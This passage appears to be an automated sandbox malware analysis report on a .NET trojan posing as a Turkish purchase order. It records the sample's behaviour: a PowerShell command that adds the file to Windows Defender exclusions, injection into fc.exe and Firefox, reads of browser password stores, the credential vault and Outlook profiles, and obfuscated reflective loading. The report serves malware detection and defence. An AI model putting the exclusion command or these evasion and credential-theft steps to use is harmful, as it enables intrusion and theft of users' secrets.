Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/7@15/11
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.log Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csme5hsf.fwq.ps1 Jump to behavior
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: fc.exe, 00000009.00000003.2333399576.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2334194872.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4151524691.00000000006C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
Source: C:\Windows\SysWOW64\fc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe" Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe" Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: fc.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fc.pdbGCTL source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rZwD.pdbSHA256 source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: Binary string: rZwD.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2056801260.000000000083E000.00000002.00000001.01000000.0000000C.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4151437192.000000000083E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.cs .Net Code: U5x7JYn9i8 System.Reflection.Assembly.Load(byte[])
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.2cdc3ac.0.raw.unpack, -Module-.cs .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.2cdc3ac.0.raw.unpack, PingPong.cs .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.cs .Net Code: U5x7JYn9i8 System.Reflection.Assembly.Load(byte[])
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.cs .Net Code: U5x7JYn9i8 System.Reflection.Assembly.Load(byte[])
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.7160000.4.raw.unpack, -Module-.cs .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.7160000.4.raw.unpack, PingPong.cs .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 9.2.fc.exe.339cd08.2.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 11.0.akwoJPEqdiyPQmCnaGzo.exe.2c8cd08.1.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 11.2.akwoJPEqdiyPQmCnaGzo.exe.2c8cd08.1.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 12.2.firefox.exe.3b95cd08.0.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: 0xDAD73746 [Mon May 6 15:31:18 2086 UTC]
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07183AD7 push ebx; retf 0_2_07183ADA
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0040C8DF push eax; ret 3_2_0040C8E1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00403180 push eax; ret 3_2_00403182
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00404A99 push FFFFFFBBh; ret 3_2_00404A9B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_004203D3 push esi; iretd 3_2_004203DE
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0041A3FC push eax; iretd 3_2_0041A425
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00416C49 push edi; iretd 3_2_00416C4C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00414499 push esi; ret 3_2_004144CF
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_004144A3 push esi; ret 3_2_004144CF
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0040AE1C push 300DAF1Eh; ret 3_2_0040AE21
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0040C6C5 push 0000006Eh; ret 3_2_0040C6D1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00404FCB push ds; iretd 3_2_00404FCC
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018C225F pushad ; ret 3_2_018C27F9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018C27FA pushad ; ret 3_2_018C27F9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F09AD push ecx; mov dword ptr [esp], ecx 3_2_018F09B6
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018C283D push eax; iretd 3_2_018C2858
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018C1368 push eax; iretd 3_2_018C1369
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D009AD push ecx; mov dword ptr [esp], ecx 9_2_02D009B6
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003B074C push 00000047h; retf 9_2_003B07F8
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003B07D2 push 00000047h; retf 9_2_003B07F8
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003AB196 push FFFFFF94h; iretd 9_2_003AB198
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003AB186 push esi; iretd 9_2_003AB187
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003A7279 push eax; iretd 9_2_003A72A2
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003AD250 push esi; iretd 9_2_003AD25B
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003AD24A push esi; iretd 9_2_003AD25B
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003A1320 push esi; ret 9_2_003A134C
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0039D4A0 push esi; ret 9_2_0039D4AB
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_00399542 push 0000006Eh; ret 9_2_0039954E
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_00391916 push FFFFFFBBh; ret 9_2_00391918
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003A3AC6 push edi; iretd 9_2_003A3AC9
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_00397C99 push 300DAF1Eh; ret 9_2_00397C9E
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: section name: .text entropy: 7.979735073551513
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.cs High entropy of concatenated method names: 'QwhxbngOwY', 'aBaxBJ1ibE', 'nttxOp5E0K', 'FqGxhRfVUb', 'TmPxT3j8El', 'jLvxE14j47', 'XU9xmsPQkL', 'kXtxnPdkYV', 'Efaxd52NQM', 'aMExSZUvvJ'
